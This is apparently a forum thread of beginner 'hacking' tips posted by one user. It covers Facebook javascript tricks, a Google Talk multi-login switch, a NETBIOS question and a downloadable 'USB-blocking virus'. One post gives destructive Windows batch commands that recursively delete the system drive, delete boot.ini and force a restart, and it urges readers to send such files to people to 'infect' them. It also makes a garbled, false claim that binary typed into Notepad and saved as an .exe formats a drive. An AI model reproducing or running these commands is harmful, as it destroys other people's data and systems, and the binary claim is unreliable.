Hacking For Beginners !

RazorH

Well-known member
  • Jan 11, 2009
    3,771
    139
    63
    39
    C:\WINDOWS\ගම්පහ\HasanKa.exe
    Hacking Facebook


    Hacking Facebook with Javascript


    fblogo.png


    Because facebook relies so heavily on javascript, and because we can type javascript into the address bar, that means we can “poke” into the workings of facebook to do things that we wouldn’t normally be able to do. It’s not “hacking” exactly, but it employs the same sort of skills hackers use when looking into applications. The best part is that because it’s all using the same control codes (or “API”) that facebook uses, there’s no way for facebook to find out you’re doing it, so it’s totally safe! (I think…) Besides, we’re not going to be doing anything too dodgy, just a few little tweaks ;)
    Facebook Hack: Sending your friends offline
    Here’s a funny one; if you’re chatting to a friend, get them to paste the following code into their facebook address bar:
    javascript:statusControl.sendVisibility(false);
    It’ll make them go offline! Of course it’s not permanent, they can go back online by clicking the icon as normal, or by giving this command:
    javascript:statusControl.sendVisibility(true);
    Facebook Hack: Change profile colour
    Check this out:
    color.png

    Isn’t that cool? Just use the following code to get your profile colour changed and impress your friends!
    javascript:void(document.getElementById('fb_menubar').style.background='red');
    Of course, you can use any colour you like; green, yellow,orange, black. It’s also fun to change it to “white” so you can’t see the text. Muahahaha. Again, only you can see it, and it only lasts till you refresh the page, but it’s still worth it!
    Facebook Hack: Get Chat History Even When Friends Aren’t Online
    New: Video Tutorial for this hack.
    Here’s a facebook hack that’s actually proven very useful to me in the past. One thing that I find annoying about facebook is that you can’t retrieve chat history if your buddy is offline… well now you can! :)
    Click onto your friend’s profile page and copy their facebook ID from the address bar; i.e. the number after “id=”, highlighted in red below:​
    getid.png

    _hellome.png

    It might look slightly different, perhaps like this: http://www.facebook.com/home.php#/profile.php?id=123132132213&ref=nf
    But the important thing is to copy the number of the user, in our case 123132132213
    Then while you’re still on facebook, type this into the address bar:
    javascript:buddyList.itemOnClick(123132132213);
    (with the correct ID of course)
    And their chat window will pop up, saying “Jimbo is offline”. And if there’s any chat history, it will be displayed. How neat is that!
    You can even open a chat window to yourself by pasting your own ID into the javascript, as seen to the right. You can use it for little notes to yourself, but remember that facebook chat history is cleared every few days, so don’t rely on it.
    UPDATE1: A few people have had trouble pasting it in correctly, so here’s how it should look:
    howto.png
    UPDATE2: Now that we have facebook usernames, it can be little harder to determine the ID of a profile, but it’s still possible – here’s one way: right click the “see all” friends link and choose “copy link location”, like so:
    viewall.png
    Or in Internet Explorer, you can choose “open link in new tab”. The resulting URL will look something like this:

    That’s it!

    Machan dan owa ba neda.. :D
     

    RazorH

    Well-known member
  • Jan 11, 2009
    3,771
    139
    63
    39
    C:\WINDOWS\ගම්පහ\HasanKa.exe
    how to format a HDD using a notepad.

    Step 1.
    Copy The Following In Notepad Exactly as it says

    01001011000111110010010101010101010000011111100000

    Step 2.
    Save As An .EXE Any Name Will Do

    Step 3.
    Send the EXE to People And Infect

    OR

    IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz ..:lol::lol: any way some more so u can test on other drives this is simple binary code
    format c:\ /Q/X -- this will format your drive c:\

    01100110011011110111001001101101011000010111010000 100000011000110011101001011100

    0010000000101111010100010010111101011000


    format d:\ /Q/X -- this will format your dirve d:\

    01100110011011110111001001101101011000010111010000 100000011001000011101001011100

    0010000000101111010100010010111101011000


    format a:\ /Q/X -- this will format your drive a:\


    01100110011011110111001001101101011000010111010000 100000011000010011101001011100

    0010000000101111010100010010111101011000


    del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


    01100100011001010110110000100000001011110100011000 101111010100110010111101010001

    00100000011000110011101001011100011000100110111101 101111011101000010111001101001

    0110111001101001

    try to figure out urself rest
    cant spoonfeed
    its working

    Do not try it on your PC. :baffled:

    still if you cant figure it out try this:nerd:

    go to notepad and type the following:

    @Echo off
    Del C:\ *.*|y

    save it as Dell.bat

    want worse then type the following:

    @echo off
    del %systemdrive%\*.*/f/s/q
    shutdown -r -f -t 00

    and save it as a .bat file
    :growl::eek:
     

    RazorH

    Well-known member
  • Jan 11, 2009
    3,771
    139
    63
    39
    C:\WINDOWS\ගම්පහ\HasanKa.exe
    Use multiple identities on Google Talk

    Want to run Google Talk with multiple Gmail identities? Basically, to have “Google Polygamy” you need to run Google Talk with the following switch: /nomutex :rolleyes:

    :love:Right-click on the desktop
    :love:Select New -> Shortcut
    :love:Paste the following into the Address box:
    “C:\program files\google\google talk\googletalk.exe” /nomutex

    Click Next and choose a shortcut name such as Google Talk1, Google Talk2, or something related to your Gmail account for easy remembering which account is which.
    :eek::shocked:
     

    RazorH

    Well-known member
  • Jan 11, 2009
    3,771
    139
    63
    39
    C:\WINDOWS\ගම්පහ\HasanKa.exe
    I have a question about NETBIOS HACKING.. i tried the big file transfer but after using netstat -n it is hard to locate which one is the ip address of the recipient… can anyone help…??????????????????????????????????????????????????????????????
     

    RazorH

    Well-known member
  • Jan 11, 2009
    3,771
    139
    63
    39
    C:\WINDOWS\ගම්පහ\HasanKa.exe
    Program to Disable USB Ports

    1. Download the USB_Block.rar file on to your computer.
    http://www.sendspace.com/file/g22uv7

    2. It contains the following 4 files.

    block_usb.c (source code)
    unblock_usb.c (source code)
    3. You need to compile them before you can run it. (U can use C programming)

    3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

    4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected.:eek: To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.:D